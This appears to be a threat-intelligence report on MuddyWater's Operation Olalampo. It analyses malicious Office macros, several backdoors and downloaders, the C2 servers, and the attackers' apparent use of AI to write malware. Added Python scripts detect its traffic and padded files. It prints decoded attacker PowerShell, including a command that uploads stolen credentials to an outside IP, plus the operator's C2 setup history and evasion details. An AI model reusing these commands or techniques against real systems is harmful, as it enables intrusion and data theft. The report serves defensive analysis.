Introduction

The Group-IB Threat Intelligence Team has identified a new cyber campaign attributed with high confidence to the Iranian threat actor known as MuddyWater. This campaign, dubbed Operation Olalampo, targeted multiple organizations and individuals primarily across the MENA region, aligning with the ongoing geopolitical tensions.

First observed on 26 January 2026, the operation involved the deployment of several novel malware variants exhibiting tactical and technical overlap with samples previously attributed to the MuddyWater threat group. Notably, one variant leveraged a Telegram bot as a command-and-control (C2) channel.

Monitoring of this Telegram C2 bot revealed valuable insight into MuddyWater’s post-exploitation activity, including executed commands, deployed tools, and data collection techniques. The bot’s activity also exposed limited historical usage in late 2025, indicating infrastructure reuse rather than a separate campaign, while the core tradecraft remains consistent with MuddyWater’s known operations.

Key discoveries

  • A targeted campaign primarily impacting organizations in the MENA region.
  • Discovery of four new malware variants: a Rust backdoor dubbed CHAR, two downloaders called GhostFetch and HTTP_VIP, and an advanced backdoor called GhostBackDoor.
  • Indicators suggesting AI-assisted malware development.
  • Use of a Telegram bot as a C2 channel, exposing post-exploitation activity.
  • Discovery of the custom Python C2 server used by HTTP_VIP, its installation setup, and the list of infected victims.
  • Infrastructure overlap linking the campaign to historical MuddyWater operations dating back to October 2025.

Who may find this blog interesting:

  • Cyber Threat Intelligence and Threat Hunting Specialists.
  • Cybersecurity Analysts and Corporate Security Teams.
  • National Cybersecurity Centers and Intelligence Agencies.
  • Computer Emergency Response Teams (CERTs).
  • Malware and reverse engineering analysts.

MuddyWater: Threat Intelligence Overview

MuddyWater is a well-known Iranian-linked threat actor that has been active for several years, primarily targeting government, telecommunications, energy, and critical infrastructure sectors across the Middle East and beyond. The group is known for its use of spear-phishing campaigns, custom malware, and consistent post-exploitation tradecraft, and has been the subject of multiple public and private threat intelligence reports.

Group-IB customers can access comprehensive and up-to-date intelligence on MuddyWater — including infrastructure, tooling, indicators, and activity tracking — via the Group-IB Threat Intelligence Portal.

Additional technical details on malware referenced in this report are also available through Group-IB’s Malware Database and Malware Detonation Platform, which provides behavioural analysis and sandbox reports for known samples.

Technical Analysis

The campaign involved multiple attacks against organizations and individuals primarily across the MENA region starting around 26 January 2026. This operation comes in alignment with the current geopolitical escalation in the region.

These attacks follow similar patterns and align with the kill chains previously observed in MuddyWater attacks: they start with a phishing email carrying a Microsoft Office document attachment whose malicious macro code decodes the embedded payload, drops it on the system and executes it, providing the adversary with remote control of the system. Although delivery methods across the various attacks were similar, multiple final payloads were observed, including HTTP_VIP, GhostBackDoor, and CHAR. Furthermore, the analysis showed that in addition to phishing, MuddyWater actively sought to exploit recently disclosed vulnerabilities on public-facing servers.

Figure 1. Overview of the Infection Attack Flow

Microsoft Office Documents

As part of Operation Olalampo, MuddyWater relied on various malicious Microsoft Office documents for malware delivery, tailored for distinct targets. Multiple document variants were observed during the campaign, all following the same macro-based execution logic with minor implementation differences.

Variant #1: Excel Document With Accounting Tables

The first observed variant is a malicious Microsoft Excel document mimicking an energy and marine services company in the Middle East. The targets of this variant are likely to be contractors associated with this organization or the organization itself. This variant leads to the deployment of CHAR backdoor.

Figure 2. Malicious Microsoft Excel Before Enabling Macros

Macro Functionality:

  1. Execution begins with the Workbook_Open event, which automatically triggers the main subroutine when the Excel file is opened, provided that macros are enabled.
  2. The macro then decodes the payload and drops it to the path “C:\Users\Public\Downloads\novaservice.exe”.
  3. The final payload is the CHAR Rust backdoor, which uses a Telegram bot as its C2 server.

Variant #2

This variant also adopts the theme of the same energy and marine services company used in Variant #1, and its targets are likely to be contractors related to that company or the company itself. The document leads to the deployment of the GhostFetch downloader, which subsequently downloads GhostBackDoor.

Figure 3. Malicious Microsoft Excel Shown on Variant #2

Macro Functionality:

  1. Execution begins with the Workbook_Open() subroutine, which runs automatically when the Excel workbook is opened and macros are enabled.
  2. The script enters a wait() function that executes a nested loop structure to evade sandbox hooks for sleep functions.
  3. Next, the macro retrieves a decimal-encoded string stored in a hidden UI element (UserForm1.TextBox1.Text), decodes it, drops the result to C:\Users\Public\Documents\MicrosoftExcelUser.exe and executes it.
  4. The dropped payload is the GhostFetch downloader, which then deploys GhostBackDoor.

Variant #3

The third variant is a Microsoft Word document carrying multiple themes, such as flight tickets and reports. The targets of this variant appear to be individuals of interest and system integrator companies in the Middle East. This variant leads to the deployment of the HTTP_VIP downloader, which then deploys the AnyDesk RMM tool.

Figure 4. Malicious Documents

Macro Functionality:

  1. Execution begins with the Workbook_Open() subroutine, which runs automatically when the Excel workbook is opened and macros are enabled.
  2. The script enters a wait() function that executes a nested loop structure to evade sandbox hooks for sleep functions.
  3. Next, the macro retrieves a decimal-encoded string stored in a hidden UI element (UserForm1.TextBox1.Text), decodes it, drops the result to C:\Users\<username>\Downloads\pic.LOG or C:\Users\Public\Documents\MicrosoftWordUser.exe and executes it.
  4. The dropped payload is the HTTP_VIP downloader, which downloads the AnyDesk RMM tool.

Dropped Payloads

The malicious document variants drop three distinct types of malware: two downloaders, named GhostFetch and HTTP_VIP, and one backdoor developed in Rust called CHAR according to its PDB path.

GhostFetch (Downloader):

GhostFetch is a first-stage downloader designed to fetch and execute secondary payloads directly in memory.

Once the malware is executed, it will check if the command-line argument “static” is passed, and if so, it will start “explorer.exe shell:RecycleBinFolder”.

Anti-Analysis & Evasion

The malware is extremely sensitive to sandbox environments. It terminates immediately if it detects:

  • Hardware Profiles: RAM < 2 GB, < 2 CPU cores, or fewer than 2 previously connected USB devices.
  • User Activity: It validates mouse movements and checks screen resolution.
  • Analysis Tools: It scans for debuggers, virtual machine artifacts, and AV software.
  • Execution Timing: Uses GetTickCount64 to detect if it is being stepped through by an analyst.

Persistence & Delivery

  • Path: Copies itself to %LOCALAPPDATA%\microsoft\windows\burnutill\burn.exe after a minor modification, so the copy has a different hash and a search for the original file hash will not find it.
  • Registry: Maintains persistence via the User Shell Folders\Startup path.
  • Mechanism: Decodes a hardcoded C2 list (primary: promoverse[.]org) and downloads an AES-encrypted PE file, which it then reflectively loads into memory.

The malware exhibits a behavior in which it attempts to re-execute itself multiple times after successfully fetching a second-stage payload from its command-and-control (C2) server. This is likely to retrieve any additional second-stage payloads the C2 might offer. This recurrent execution generates significant system noise, which could potentially trigger alerts for the security team. The exact reasoning behind this noisy, repeated self-execution remains unclear.

Figure 5. GhostFetch Malware Process Tree

GhostBackDoor (GhostFetch downloaded Second Stage):

The second stage is a sophisticated backdoor that adapts its installation based on the environment’s privileges:

  • Administrative Access: Installs as a service named MicrosoftVersionUpdater.
  • Security Tools Present: Masks itself using the Windows Recycle Bin ClassID ({645FF040-5081-101B-9F08-00AA002F954E}).
  • Standard User: Defaults to the startup registry folder.

Command & Control (C2) Functions

Communications are AES-encrypted and use French-named API endpoints. The malware utilizes a granular command structure to evade network detection:

Command 1 (Ping): Heartbeat check via /api/accueil/actualiser.

Commands 3, 4, 5, 6 (Interactive Shell): Separate commands to start CMD, write input to it, read its output, and close the interactive shell. Results are sent to:

  • /api/graphique/obtenir-donnees
  • /api/graphique/consulter
  • /api/accueil/televerser

Commands 7, 8 (File Write): Create and populate files on the victim machine. Results are sent to:

  • /api/utilisateurs/enregistrer
  • /api/accueil/filtrer

Commands 9, 0xA (File Read): Request and retrieve data from local files. Results are sent to:

  • /api/accueil/rechercher

Command 0xB: Stops the malware from sleeping between connections.

Command 0xC (Re-run GhostFetch): Triggers the original downloader “%LOCALAPPDATA%\Microsoft\Windows\BurnUtill\burn.exe” to fetch more payloads.

Commands 0x12, 0x16, 0x17, 0x18 (Process Stream): Advanced management of input/output streams for created processes: create processes, read from and write to their input/output streams, and close their handles. Results are sent to:

  • /api/authentification/renouveler_token
  • /api/accueil/televerser
The malware supports various commands, but its most notable feature is the fragmentation of operations. By using one command to spawn a command shell and distinct commands to interact with it, the malware fragments its network traffic. This behavior is likely designed to evade network detection engines and cause incomplete or delayed alerting.
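The fragmentation described above is exactly what a single-URI detection rule misses, so the sequence of endpoints, not any one request, is the better signal. The following script is an added example (not code from the report): it runs over a few constructed proxy log lines and flags any client that touches two or more of the GhostBackDoor endpoints listed above within a short window; the log format and the promoverse.org host in the sample lines are assumed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# GhostBackDoor URIs and the operation they carry, taken from the command table above.
GHOSTBACKDOOR_URIS = {
    "/api/accueil/actualiser": "ping",
    "/api/graphique/obtenir-donnees": "shell-result",
    "/api/graphique/consulter": "shell-result",
    "/api/accueil/televerser": "shell-result/process-stream",
    "/api/utilisateurs/enregistrer": "file-write",
    "/api/accueil/filtrer": "file-write",
    "/api/accueil/rechercher": "file-read",
    "/api/authentification/renouveler_token": "process-stream",
}

# Constructed sample proxy log (not real traffic): timestamp, client, method, URL, status.
# Client 10.0.0.15 shows a beacon followed by a fragmented shell session;
# client 10.0.0.22 only produces a lone beacon plus an unrelated URL.
SAMPLE_LOG = """\
2026-01-28T09:00:01Z 10.0.0.15 POST https://promoverse.org/api/accueil/actualiser 200
2026-01-28T09:00:31Z 10.0.0.15 POST https://promoverse.org/api/accueil/actualiser 200
2026-01-28T09:01:02Z 10.0.0.15 POST https://promoverse.org/api/graphique/obtenir-donnees 200
2026-01-28T09:01:05Z 10.0.0.15 POST https://promoverse.org/api/graphique/consulter 200
2026-01-28T09:01:09Z 10.0.0.15 POST https://promoverse.org/api/accueil/televerser 200
2026-01-28T09:03:44Z 10.0.0.22 GET https://example.org/api/accueil/index 200
2026-01-28T09:05:10Z 10.0.0.22 POST https://promoverse.org/api/accueil/actualiser 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def parse_line(line):
    """Parse one space-separated log line into a dict, or None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    # Match on the path only: the host may change, the French endpoints do not.
    path = re.sub(r"^https?://[^/]+", "", url)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "client": client,
        "method": method,
        "path": path,
        "status": int(status),
    }


def hunt_ghostbackdoor(log_text, window=timedelta(minutes=5), min_distinct=2):
    """Return {client: sorted distinct GhostBackDoor URIs} for every client that
    hits at least `min_distinct` distinct known URIs inside a `window`-long span.
    With min_distinct=2 a lone heartbeat is ignored; the shell/file/process
    sequence that follows a heartbeat is what gets flagged."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["path"] in GHOSTBACKDOOR_URIS:
            hits[ev["client"]].append((ev["ts"], ev["path"]))
    findings = {}
    for client, events in hits.items():
        events.sort()
        # Slide a window starting at each event over that client's timeline.
        for i, (t0, _) in enumerate(events):
            paths = {p for t, p in events[i:] if t - t0 <= window}
            if len(paths) >= min_distinct:
                findings[client] = sorted(paths)
                break
    return findings


def describe(findings):
    """Map each flagged client to the operations its URIs imply."""
    return {c: sorted({GHOSTBACKDOOR_URIS[p] for p in paths}) for c, paths in findings.items()}


if __name__ == "__main__":
    found = hunt_ghostbackdoor(SAMPLE_LOG)
    for client, ops in describe(found).items():
        print(client, "->", ", ".join(ops))
```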

HTTP_VIP (Downloader):

The HTTP_VIP malware is a native downloader that serves as a bridge for further exploitation. Its execution flow is highly selective:

  1. System Reconnaissance: Upon execution, it harvests the local username and computer name.
  2. Domain Guardrail: The malware performs a check for a hardcoded company domain belonging to a health care provider. If the infected machine is joined to this domain, the malware terminates execution. Further investigation revealed that the domain is associated with a honeypot, which the threat actor appears to have intentionally excluded.
  3. C2 Authentication: It connects to a command-and-control (C2) server “codefusiontech[.]org” to authenticate.
  4. Payload Deployment: It retrieves a file from the C2, writes it to a local directory, and executes it. In observed cases, the dropped payload is the legitimate AnyDesk RMM tool, used to provide the attacker with direct remote access.

New HTTP_VIP Variant

A new variant of the HTTP_VIP malware has been identified based on its PDB path and significant code similarities with earlier versions. Both variants share nearly identical initialization routines, including API resolution, system information collection, and C2 communication pattern — specifically the use of the /postifo URI to send victim information and /connect to retrieve instructions. The observation of two variants being deployed during Operation Olalampo suggests rapid development and a fast-paced nature to the operation.

While the previously observed version acted as a downloader for a second-stage payload (specifically the AnyDesk RMM tool), the newly identified variant operates as a standalone backdoor. It is capable of receiving and executing the following commands:

  • 201: Start interactive shell (output to /ecmd)
  • 202: Upload file (output to /esend)
  • 203: Download file (output to /erecv)
  • 210: Capture clipboard contents
  • 222: Update sleep/beacon interval

CHAR (Rust Backdoor)

CHAR is a Rust-based backdoor controlled via a Telegram bot, representing a tactical shift for MuddyWater.

Below are the malicious commands supported by the C2:

  • CMD: execute a CMD command
  • PowerShell: execute a PowerShell command
  • Change directory

Analysis of the malware artifacts reveals that one of the command handlers exhibits signs of AI-assisted development. This aligns with recent reports from the Google Threat Intelligence team regarding MuddyWater’s use of Gemini to write malware. Specifically, we identified debug strings containing emojis — a trait rarely seen in human-authored code. We observed four instances of this anomaly, suggesting that the adversary likely used an AI model to generate specific code segments and failed to sanitize the debug strings before compilation; the same strings can also be seen in the command-and-control logs from the Telegram bot.

Infrastructure Analysis

While the CHAR backdoor leverages the Telegram API as its command-and-control (C2) channel, the GhostBackDoor and HTTP_VIP malware communicate with threat actor-controlled C2 servers. Analysis of that infrastructure provides unique insight into offensive cyber operations and helps to understand the bigger picture of the attack. By understanding the C2 infrastructure, organizations can proactively defend against attacks by identifying adversarial infrastructure before an attack is launched. This intelligence is also valuable for attribution.

C2 Server Analysis

GhostFetch C2 Infrastructure

The domain promoverse[.]org was used by the GhostFetch loader and the associated GhostBackDoor in this campaign. The C2 server was protected with Cloudflare; however, the real IP address was identified as 209[.]74[.]87[.]67 using the Group-IB Threat Intelligence Portal. The URL endpoints used by the malware are described in the malware analysis section above.

Figure 7. Infrastructure analysis with Group-IB’s Graph

Analysis revealed a direct link to previously observed MuddyWater infrastructure, specifically the domain (netvigil[.]org), which hosted identical HTML content as shown below and was used in earlier campaigns alongside the GhostFetch and GhostBackDoor malware back in October 2025.

Figure 8. HTML content served during active C2 operation.

Additionally, a decoy website was observed on the server that presents itself as “Promoverse – Digital Marketing & Brand Promotion” and runs on the server stack Werkzeug/3.1.5 Python/3.12.3. Based on its structure and content, the site is highly likely to have been generated using AI. Despite its legitimate appearance, the site is a single non-functional HTML page: its buttons only scroll the page and lead nowhere else, and its social media buttons are empty as well.

Figure 9. Decoy site observed on the C2 server.

C2 Timeline Summary:

  • Domain registration date: 2025-12-21
  • Certificate validity: 2026-01-07 to 2026-04-07
  • Decoy site timeframe: ~2026-01-15 to ~2026-01-25
  • GhostFetch/GhostBackDoor C2 timeframe: ~2026-01-27 to ~2026-01-30

The short operational window of the GhostFetch C2 infrastructure suggests that the threat actor either deploys additional tools following the initial compromise or dynamically rotates C2 servers during later stages of the intrusion.

HTTP_VIP C2 Infrastructure

Two domains were used by HTTP_VIP samples: miniquest[.]org and codefusiontech[.]org.

The domain miniquest[.]org was registered via NameCheap on 2026-01-27T12:44:23Z and was protected with Cloudflare. The real IP address was identified as 159[.]198[.]43[.]141 via the SSL certificate using the Group-IB Threat Intelligence Platform:

Figure 10. Group-IB Threat Intelligence Platform showing results for miniquest[.]org domain

The C2 is served using a Werkzeug/3.1.5 Python/3.12.3 backend; a detailed description of how the C2 is set up is provided in the Server Side C2 Analysis section below.

C2 Timeline Summary:

  • Domain registration date: 2026-01-27
  • Certificate validity: 2026-02-01 to 2026-05-02
  • HTTP_VIP C2 timeframe: 2026-02-02 to 2026-02-13

The domain codefusiontech[.]org was registered via NameCheap on 2026-02-02T06:24:36.42Z and was protected with Cloudflare as well. The real IP address was identified as 209[.]74[.]87[.]100 via the SSL certificate using the Group-IB Threat Intelligence Platform:

Figure 11. Group-IB Threat Intelligence Platform showing results for codefusiontech[.]org domain

The C2 infrastructure was served using a Werkzeug/3.1.5 Python/3.12.3 backend. A detailed description of the C2 setup is provided below.

C2 Timeline Summary:

  • Domain registration date: 2026-02-02
  • Certificate validity: 2026-02-09 to 2026-05-10
  • HTTP_VIP C2 timeframe: 2026-02-11 to 2026-02-15

An open directory was discovered on the same IP address, containing several RMM and post-exploitation tools. The root directory listing exposes FMAPP.exe / FMAPP.dll, which have also been observed in previous MuddyWater open-directory findings. The directory was exposed using a Python Simple HTTP server (SimpleHTTP/0.6 Python/3.12.3).

Figure 12. Directory listing captured on 209[.]74[.]87[.]100.


Server Side C2 Analysis

During infrastructure analysis, we were able to obtain the source code running on the C2 server for HTTP_VIP. The C2 server supporting this malware is a custom-built web app using the Flask Python framework. It manages HTTP_VIP malware connections and maintains an SQLite database containing a list of compromised hosts.

In addition to the source code of the HTTP_VIP server, we obtained the following:

  • AnyDesk Binaries: Legitimate remote access tools used for direct control of infected hosts.
  • FMAPP.dll: A malicious injector used to deploy a SOCKS5 reverse proxy, allowing the attacker to tunnel network traffic through the infected host.

The server offers multiple API endpoints for the HTTP_VIP loader operation:

  • /postinfo: Agent registration endpoint, which receives victim host information through the HTTP headers of a POST request:

      • X-Computer-Name
      • X-Username
      • X-Domain-Name
      • X-Windows-Version
      • X-Windows-Build
      • X-Antivirus-Name

    When received, an entry is added to the agents database with this information. The response to this endpoint contains an agent_id.

  • /content: Heartbeat endpoint that HTTP_VIP contacts regularly; it checks whether the threat actor has issued any commands for the agent_id sent in the POST request body.

    The defined commands are list, select, upload, exit and delete, but only the upload command is implemented. If the upload command is issued, AnyDesk is deployed on the compromised host.

    It is worth noting that the server holds a base AnyDesk sample (AnyDesk.exe) and, for each agent, creates a new copy (AnyDesk<agent_id>.exe) with a random number of random bytes appended to it. This is an evasion technique that randomizes the hash of the sample without altering its logic.

  • /upload-results: Used for downloading the AnyDesk binary in chunks; the HTTP header X-ChunkId is used to manage the chunks.

  • /ercv: Used to inform the server that all chunks were received once the download via the /upload-results endpoint has finished.
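The random-byte padding applied to AnyDesk<agent_id>.exe defeats full-file hash matching but leaves the PE-defined portion of the file untouched, since the appended bytes sit in the overlay after the last section. The following script is an added example, not code from the report or from the C2 server: it hashes only the bytes covered by the PE section table, builds a constructed toy PE to show that a padded copy still matches the base sample, and reports how many overlay bytes were appended.

```python
import hashlib
import os
import struct


def pe_image_end(data: bytes) -> int:
    """Return the file offset where PE-defined data ends: the end of the last
    section's raw data (or the end of the headers if there are no sections).
    Anything after this offset is overlay. Raises ValueError for non-PE input."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER (20 bytes)
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (size_opt,) = struct.unpack_from("<H", data, coff + 16)
    sec_table = coff + 20 + size_opt         # first IMAGE_SECTION_HEADER (40 bytes each)
    end = sec_table + 40 * num_sections
    for i in range(num_sections):
        # Offsets 16 and 20 inside a section header: SizeOfRawData, PointerToRawData.
        size_raw, ptr_raw = struct.unpack_from("<II", data, sec_table + 40 * i + 16)
        end = max(end, ptr_raw + size_raw)
    if end > len(data):
        raise ValueError("section data extends past end of file")
    return end


def overlay_aware_hashes(data: bytes) -> dict:
    """Full-file SHA-256 (changes with padding) beside the PE-body SHA-256
    (stable across padded copies), plus the number of overlay bytes."""
    end = pe_image_end(data)
    return {
        "sha256_full": hashlib.sha256(data).hexdigest(),
        "sha256_pe": hashlib.sha256(data[:end]).hexdigest(),
        "overlay_bytes": len(data) - end,
    }


def same_pe_body(a: bytes, b: bytes) -> bool:
    """True when two files differ at most in their overlay."""
    return overlay_aware_hashes(a)["sha256_pe"] == overlay_aware_hashes(b)["sha256_pe"]


def build_toy_pe(section_payload: bytes) -> bytes:
    """Constructed minimal PE32 layout with a single .text section. It is a
    header skeleton for the hashing demo, not an executable program."""
    hdr_size = 0x40 + 4 + 20 + 0xE0 + 40     # DOS stub, PE sig, COFF, optional hdr, 1 section hdr
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    # Machine=i386, 1 section, no timestamp/symbols, SizeOfOptionalHeader=0xE0, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)    # PE32 magic
    sec = bytearray(40)
    sec[:5] = b".text"
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<IIII", sec, 8, len(section_payload), 0x1000, len(section_payload), hdr_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(sec) + section_payload


def pad_like_http_vip(base: bytes, max_extra: int = 4096) -> bytes:
    """Simulate the server-side trick: append a random number of random bytes."""
    n = 1 + int.from_bytes(os.urandom(2), "little") % max_extra
    return base + os.urandom(n)


if __name__ == "__main__":
    base = build_toy_pe(b"\x90" * 64)
    padded = pad_like_http_vip(base)
    for name, blob in (("base", base), ("padded", padded)):
        h = overlay_aware_hashes(blob)
        print(f"{name}: full={h['sha256_full'][:16]} pe={h['sha256_pe'][:16]} overlay={h['overlay_bytes']}")
    print("same PE body:", same_pe_body(base, padded))
```

A legitimate overlay (installer payloads, an Authenticode signature) is excluded by this hash as well, so treat the PE-body hash as a matching aid alongside the full-file hash rather than a replacement for it.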

The server performs IP-based geolocation to identify the victim’s country using an IP info service:

Figure 13. HTTP_VIP C2 server logic for determining victim location.

We also identified a command history file detailing how the C2 server is deployed. This helps explain our observations in the previously analyzed infrastructure, where the active C2 server was observed on a Python-based backend during the operational timeframe, after which Apache returned 503 error pages once the operation ended.

The setup works as follows:

  1. Apache is deployed and listens on ports 80 and 443, often serving a decoy website, or no content.
  2. The Python based C2 backend is deployed on port 8080.
  3. Ports 80 and 443 are allowed through the Linux firewall, while port 8080 is blocked to prevent direct external access. Additionally, in some cases the Python C2 is bound to 127.0.0.1, making it unreachable from the internet.
  4. Incoming requests are received by Apache and internally forwarded to the python-based C2 HTTP server, enabling functional C2 communication.
  5. Once the Python backend is stopped, Apache returns 503 error messages.

In effect, Apache functions as a front-end reverse proxy and TLS terminator, while the Python application operates as a local backend service accessible only via the loopback interface. Traffic routing is handled through Apache’s mod_proxy modules, creating a layered and secure web stack on a single host.

Another notable artifact in the command history is the command “فئعط”, which corresponds to the “tmux” command mistakenly typed while another keyboard language was active. The keyboard mapping indicates the language was set to Persian, which further strengthens the attribution.

Figure 14. Keyboard mapping between English and Persian for the “tmux” command.

The original command history shows the detailed deployment process:

curl http://127.0.0.1:8080
curl http://127.0.0.1:8080/test
curl http://127.0.0.1:8080/
sudo apt install apache2 -y
sudo systemctl status apache2
sudo ufw allow 80
sudo ufw allow 443
sudo ufw reload
sudo mkdir -p /var/www/codefusiontech.org/public_html
sudo chown -R $USER:$USER /var/www/codefusiontech.org
sudo chmod -R 755 /var/www/codefusiontech.org
nano /var/www/codefusiontech.org/public_html/index.html
sudo nano /etc/apache2/sites-available/codefusiontech.org.conf
sudo a2ensite codefusiontech.org.conf
sudo a2dissite 000-default.conf
sudo systemctl reload apache2
sudo apt install certbot python3-certbot-apache -y
sudo certbot --apache
sudo a2enmod remoteip
sudo nano /etc/apache2/conf-available/cloudflare.conf
sudo a2enconf cloudflare
sudo systemctl reload apache2
curl -I https://codefusiontech.org
sudo certbot renew --dry-run
sudo nano /etc/apache2/ports.conf
sudo nano /etc/apache2/sites-available/backend-8080.conf
sudo a2ensite backend-8080.conf
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod headers
sudo systemctl restart apache2
sudo nano /etc/apache2/sites-available/codefusiontech.org-proxy.conf
sudo a2ensite codefusiontech.org-proxy.conf
sudo systemctl reload apache2
sudo ufw deny 8080
sudo ufw reload
curl http://127.0.0.1:8080
python3 -m http.server 8080
python3 -m http.server 8081
ss -ltnp | grep :8080
sudo nano /etc/apache2/ports.conf
ls /etc/apache2/sites-enabled | grep 8080
sudo a2dissite backend-8080.conf
sudo systemctl restart apache2
ss -ltnp | grep 8080
sudo nano /etc/apache2/sites-available/codefusiontech.org-proxy.conf
sudo a2ensite codefusiontech.org-proxy.conf
sudo a2enmod proxy proxy_http headers
sudo systemctl reload apache2
python3 -m http.server 8080
sudo nano /etc/apache2/sites-available/codefusiontech.org-proxy.conf
sudo a2dissite codefusiontech.org.conf
sudo systemctl reload apache2
sudo nano /etc/apache2/sites-available/codefusiontech.org-proxy.conf
sudo a2ensite codefusiontech.org-proxy.conf
sudo a2enmod proxy proxy_http headers
sudo systemctl reload apache2
python3 -m http.server 8080
sudo a2dissite codefusiontech.org.conf
sudo systemctl reload apache2
/etc/apache2/sites-available/codefusiontech.org-proxy.conf
nano /etc/apache2/sites-available/codefusiontech.org-proxy.conf
sudo a2ensite codefusiontech.org-proxy.conf
sudo a2enmod proxy proxy_http headers
sudo systemctl reload apache2
python3 -m http.server 8080 --bind 127.0.0.1
sudo apache2ctl -S
sudo a2dissite codefusiontech.org-le-ssl.conf
sudo systemctl reload apache2
sudo a2ensite codefusiontech.org-proxy.conf
sudo systemctl reload apache2
sudo apache2ctl -S
python3 -m http.server 8080 --bind 127.0.0.1
cd http
tmux new -s http
sudo nano /etc/apache2/sites-available/codefusiontech.org-proxy.conf
sudo systemctl reload apache2
sudo nano /etc/apache2/sites-available/codefusiontech.org-proxy.conf
sudo a2enmod headers proxy proxy_http
sudo systemctl restart apache2
sudo nano /etc/apache2/sites-available/codefusiontech.org-proxy.conf
sudo a2ensite codefusiontech.org-proxy.conf
sudo a2enmod proxy proxy_http headers
sudo systemctl reload apache2
tmux a -t http
sudo systemctl reload apache2
tmux a -t http
python3 -m venv venv
sudo apt install python3-venv
python3 -m venv venv
source venv/bin/activate
python3 http_vip.py 
pip install flask
python3 http_vip.py 
pip install prompt_toolkit
python3 http_vip.py 
pip install rich
python3 http_vip.py 
pip install requests
python3 http_vip.py 
pip install pycountry
python3 http_vip.py 
rm http_vip.py 
nano http_vip.py
python3 http_vip.py 
tmux kill-session -t http
tmux a -t http
tmux new -t http
tmux ls
tmux a -t http-0
tmux a -t http
tmux a -t http-0
tmux new -t http-0
فئعط
tmux
tmux ls
tmux a -t 7
tmux
xit
exit
tmux a -t http-0
tmux a -t http-0
tmux new -t http-0
tmux ls
tmux a -t http-18
tmux ls
tmux a -t http-18

C2 Telegram Bot Analysis

The Telegram bot used for C2 communication by the newly discovered CHAR malware provided a valuable source of intelligence. During analysis of a sample of this malware, the Group-IB Threat Intelligence Team discovered the name of the C2 Telegram bot, which revealed detailed information about MuddyWater operations and provided visibility into their hands-on-keyboard activity, specific command sequences and post-exploitation TTPs.

The bot’s first display name is Olalampo, and its username is stager_51_bot.

Figure 15. C2 Telegram bot information.

Figure 15. C2 Telegram bot information

The threat actor utilized the bot in two different timeframes: the first activity was observed in early October 2025, specifically between 6 and 12 October, and the second in late January 2026, when the bot had slightly different functionality:

2026-01-28 → 2026-02-01

Supported commands:
/start — CHK.
/cmd — CMD.
/shell — POWER.
/cd — CD

2025-10-06 → 2025-10-12

These commands are supported:
/start — ACK and HELP.
/prompt — execute in my ass.
/cd — change directory

Bot analysis revealed the execution of multiple PowerShell commands, as detailed below.

Observed Command Execution

Monitoring of the Telegram bot activity revealed the execution of multiple PowerShell commands indicative of post-exploitation activity.

Command #1 – Observed: 2025-10-12 08:46:28 and 2025-10-06 12:47:41

The command attempts to execute FMAPP.exe in a new process. This is a legitimate executable that sideloads FMAPP.dll, which could be a reverse SOCKS5 proxy or the Kalim backdoor, since both were observed in samples with that name.

powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy
RemoteSigned -EncodedCommand
dgBhAGMAcgBvAHMAeQBzAGkAOwAkAHYAYQBjAHIAbwBzAHkAcwBpAD0AIgB2AGEAYwByAG8A
cwB5AHMAaQAiADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAFAAcgBvAGcA
cgBhAG0ARABhAHQAYQBcAEYATQBBAFAAUAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQA
eQBsAGUAIABIAGkAZABkAGUAbgA=

Decoded:

powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy
RemoteSigned -EncodedCommand
vacrosysi;$vacrosysi="vacrosysi";Start-Process c:\ProgramData\FMAPP.exe
-WindowStyle Hidden

Command #2 – Observed: 2025-10-06 12:40:18

This command attempts to upload a file named cobe-notes.txt to an adversary-controlled C2 server. This file is noteworthy because it was previously observed in MuddyWater campaigns. It is known to contain credentials stolen by a custom browser infostealer employed by MuddyWater in earlier operations.

powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy
RemoteSigned -EncodedCommand
YQBqADsAJABhAGoAPQAiAGEAagAiADsAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMA
dAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAgADsAIAAkAHIA
ZQBzAHAAIAA9ACAAJAB3AGMALgBVAHAAbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoA
LwAvADEANAAzAC4AMQA5ADgALgA1AC4ANAAxADoANAA0ADMALwBzAHUAYwBjAGUAcwBzACIA
LAAiAGMAOgBcAHUAcwBlAHIAcwBcAHAAdQBiAGwAaQBjAFwAZABvAHcAbgBsAG8AYQBkAHMA
XABjAG8AYgBlAC0AbgBvAHQAZQBzAC4AdAB4AHQAIgApADsA

Decoded:

powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy
RemoteSigned -EncodedCommand aj;$aj="aj";$wc = New-Object
System.Net.WebClient ; $resp =
$wc.UploadFile("hxxp://143[.]198[.]5[.]41:443/success","c:\users\public\
downloads\cobe-notes.txt");

Command #3 – Observed: 2025-10-06 12:35:21

The command attempts to execute sh.exe under a new process. The binary could not be retrieved during analysis.

